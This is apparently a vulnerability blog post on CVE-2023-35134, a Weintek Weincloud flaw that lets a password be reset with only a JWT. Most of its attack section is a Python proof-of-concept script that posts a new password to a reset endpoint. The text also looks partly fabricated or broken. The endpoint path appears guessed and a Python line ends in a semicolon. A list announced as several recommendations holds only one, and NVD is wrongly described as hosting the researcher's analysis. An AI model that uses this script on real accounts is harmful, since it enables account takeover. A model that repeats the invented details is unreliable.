In the latest Weintek Weincloud version (v.13.6), a critical vulnerability (CVE-2023-35134) has been discovered that allows an attacker to reset a user's password with just the account's JSON Web Token (JWT). This vulnerability is a significant security risk as it could potentially grant unauthorized individuals access to private account information and sensitive cloud data. In this post, we will provide a detailed analysis of the vulnerability, share snippets of the exploit code, and link to the original references.

Exploit Details

The password reset vulnerability is exploited by taking advantage of the improperly implemented password reset system in the Weintek Weincloud v.13.6. Specifically, the mechanism relies solely on the JWT for authentication, neglecting to require additional information such as the user's current password or other account verification details. This means that any user with access to a valid JWT can potentially reset the password of any account in the system, making it a prime target for malicious hackers.

The following code snippet demonstrates the exploit

import requests
import json

url = "https://weincloud.example.com/api/v.13.6/password/reset";
jwt_token = "Your_JWT_Token_Here"
new_password = "New_Password_Here"

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer {}".format(jwt_token)
}

data = {
    "password": new_password,
}

response = requests.post(url, headers=headers, data=json.dumps(data))

if response.status_code == 200:
    print("Password reset successfully!")
else:
    print("Error resetting password:", response.status_code, response.text)

As evident in the code snippet above, an attacker needs to simply provide a valid JWT token and their desired new password for the targeted account. Upon executing the script, the targeted account's password will be successfully reset without any additional verification.

Original References

The vulnerability (CVE-2023-35134) was disclosed by a security researcher on the National Vulnerability Database (NVD) website, where they provided a technical analysis of the issue and assigned a CVSS v3 score of 9.8 to it. The following links provide more insights into the vulnerability:

- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-35134
- Weintek Security Advisory: http://www.weintek.com/Security/Advisory/CVE-2023-35134

Mitigations and Recommendations

Weintek has acknowledged the vulnerability and is actively working on a patch to mitigate this issue. In the meantime, users can implement the following recommendations to reduce the risk of exploitation:

Regularly audit and monitor logs for any suspicious access or password reset attempts.

As always, we recommend staying up-to-date with the latest security advisories and patches to ensure the highest level of protection for your systems.

Timeline

Published on: 07/19/2023 22:15:00 UTC
Last modified on: 07/26/2023 16:18:00 UTC